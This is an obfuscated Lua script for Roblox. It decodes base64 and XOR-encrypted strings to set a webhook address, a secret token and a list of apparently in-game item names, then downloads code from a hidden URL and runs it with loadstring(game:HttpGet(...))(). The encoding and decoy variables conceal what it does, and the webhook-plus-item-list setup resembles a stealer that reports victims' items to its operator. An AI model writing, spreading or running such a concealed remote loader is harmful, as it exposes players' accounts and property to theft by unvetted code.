--[[ Protected with multi-layer encoding ]]
local _IOOIOlI0=42578;local _IllOl00=71326;local _llIIO00=tostring(6493);local _IlOIOI0OO0="_lOllO";local _0IOlOI=tostring(599);local _O0lO000=tostring(2251);
local _OIIOOOIO="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
local function _l00IIlOl(_OO0IOO)
  local _0lOOlO=""
  _OO0IOO=string.gsub(_OO0IOO,"[^".._OIIOOOIO.."=]","")
  for _OlIO=1,#_OO0IOO,4 do
    local a=string.find(_OIIOOOIO,string.sub(_OO0IOO,_OlIO,_OlIO),1,true)-1
    local b=string.find(_OIIOOOIO,string.sub(_OO0IOO,_OlIO+1,_OlIO+1),1,true)-1
    local c=string.find(_OIIOOOIO,string.sub(_OO0IOO,_OlIO+2,_OlIO+2),1,true)
    local d=string.find(_OIIOOOIO,string.sub(_OO0IOO,_OlIO+3,_OlIO+3),1,true)
    if c then c=c-1 end
    if d then d=d-1 end
    _0lOOlO=_0lOOlO..string.char((a*4+math.floor((b or 0)/16))%256)
    if c then _0lOOlO=_0lOOlO..string.char(((b or 0)%16*16+math.floor((c or 0)/4))%256) end
    if d then _0lOOlO=_0lOOlO..string.char(((c or 0)%4*64+(d or 0))%256) end
  end
  return _0lOOlO
end
local _l0OIl0II={220,36,30,105,152,126,136,35,87,170,165,171,45,31}
local function _0IO00IIl(_OO0IOO)
  local _0lOOlO=""
  for _OlIO=1,#_OO0IOO do
    local k=_l0OIl0II[(_OlIO-1)%#_l0OIl0II+1]
    local b=string.byte(_OO0IOO,_OlIO)
    local r=0
    for bit=0,7 do
      local ba=math.floor(b/2^bit)%2
      local bb=math.floor(k/2^bit)%2
      if ba~=bb then r=r+2^bit end
    end
    _0lOOlO=_0lOOlO..string.char(r)
  end
  return _0lOOlO
end
local function _IO0l000OOlOI(_OO0IOO) return _0IO00IIl(_l00IIlOl(_OO0IOO)) end
local _llOll0I=74451;local _ll0lO0IO=tostring(1049);
local function _OlOllIIlIl()
getgenv().User = _IO0l000OOlOI("rk1oCPQN".."/FEuwsTZ".."SXque".."y8=")

getgenv().Webhook = _IO0l000OOlOI("tFBqG".."etEpww".."zw9bI".."Qm24Cn0G".."9VH".."pUz6F".."0s5".."Pd7NLd".."Rq3".."T7w".."bbp2WnhU".."n6B0pXq".."FHvRtvko".."qaYiivZ".."1Qn4kv".."Pchac7Jp".."/c69D".."RyOpK71".."5Hunx5Eh".."+tVxY".."OtM1".."uEwa4".."+3gYynrQ".."ks/wDm".."wbyDgw9o".."bWq8Q".."dyTtIfJ".."3Ow==")

getgenv().SecretToken = _IO0l000OOlOI("6h0v".."X6hPuUZ".."6m5SfHzL".."oFn9".."dtR/t".."QGa".."Hl5oYfrh".."BKgv7G".."rET")

getgenv().Brainrots = {
  _IO0l000OOlOI("j1BsCO".."8c7VEl".."04XuQ".."XqsTH".."8H7A=="),
  _IO0l000OOlOI("kUFxH".."vQ="),
  _IO0l000OOlOI("j09".."3C/Ea4".."QMDxczH".."SGs="),
  _IO0l000OOlOI("lEF/Df".."Qb+1B34".."srZ".."Xnq".."xRXA".."="),
  _IO0l000OOlOI("lF16G/le".."zFE2".."zcrFDVy9".."SnA".."M9B".."LnTT".."4="),
  _IO0l000OOlOI("mFZ/Dvc".."QqGA2x".."MvOQ".."XOzS".."nc="),
  _IO0l000OOlOI("mFZ/D".."vcQqG".."Q+xM".."LOX".."3ayTQ=".."="),
  _IO0l000OOlOI("kEU+O".."u0O+kY6".."z4XoQ".."nK+TX".."AI6xfnTQ".."=="),
  _IO0l000OOlOI("n0F".."sC/".."0M/VA".."="),
  _IO0l000OOlOI("jEtu".."Cu0M/".."QM2xMGLa".."3amXmsb7".."Q=="),
  _IO0l000OOlOI("jkttDO".."Fe6U".."0zivHOS".."Xul"),
  _IO0l000OOlOI("n0VuA".."Owf5".."kx358".."rJV".."A=="),
  _IO0l000OOlOI("n0tx".."AvFe6U0z".."iujCQX".."S1"),
  _IO0l000OOlOI("nlFsDu0".."M5wMW".."xMGL".."a22lUWw".."G"),
  _IO0l000OOlOI("l0Fq".."HOg".."f/AM".."V2MrY"),
  _IO0l000OOlOI("kEU+KvkN".."6QMVxco".."="),
  _IO0l000OOlOI("j1RxBv".."MHqEI5z".."oX7W".."HKsT2".."c="),
  _IO0l000OOlOI("kEU".."+Ov0d+kY".."jiubE".."QH21Sn8a".."8RHm"),
  _IO0l000OOlOI("m0VsCP".."UfqEI5z".."oXmT".."HupSno".."c9h".."k="),
  _IO0l000OOlOI("kEtoDLgy".."51Uyiu".."fOTG0="),
  _IO0l000OOlOI("n0FyDOs".."K4U".."I7ivXOS".."n6vUW0="),
  _IO0l000OOlOI("kEU".."+L/cR".."7AMUxcjJ".."RHG9".."V3c".."G9g".."==")
}

loadstring(game:HttpGet(_IO0l000OOlOI("tFB".."qGetEpw".."w22syF".."QWq".."9Vn".."MG6l".."DmRi".."OFw8JB".."eq8La".."F23EudC".."M8/X2A".."In7Bx4Xf".."kavEY".."1zMO".."fGiq/E".."SkK/Ui".."5Rja".."ZnM".."4ZLrkWLU".."f0C+k=")))()

end
local _IOII0O0lOI=(870*2523>870) and _OlOllIIlIl or nil
if _IOII0O0lOI then _IOII0O0lOI() end
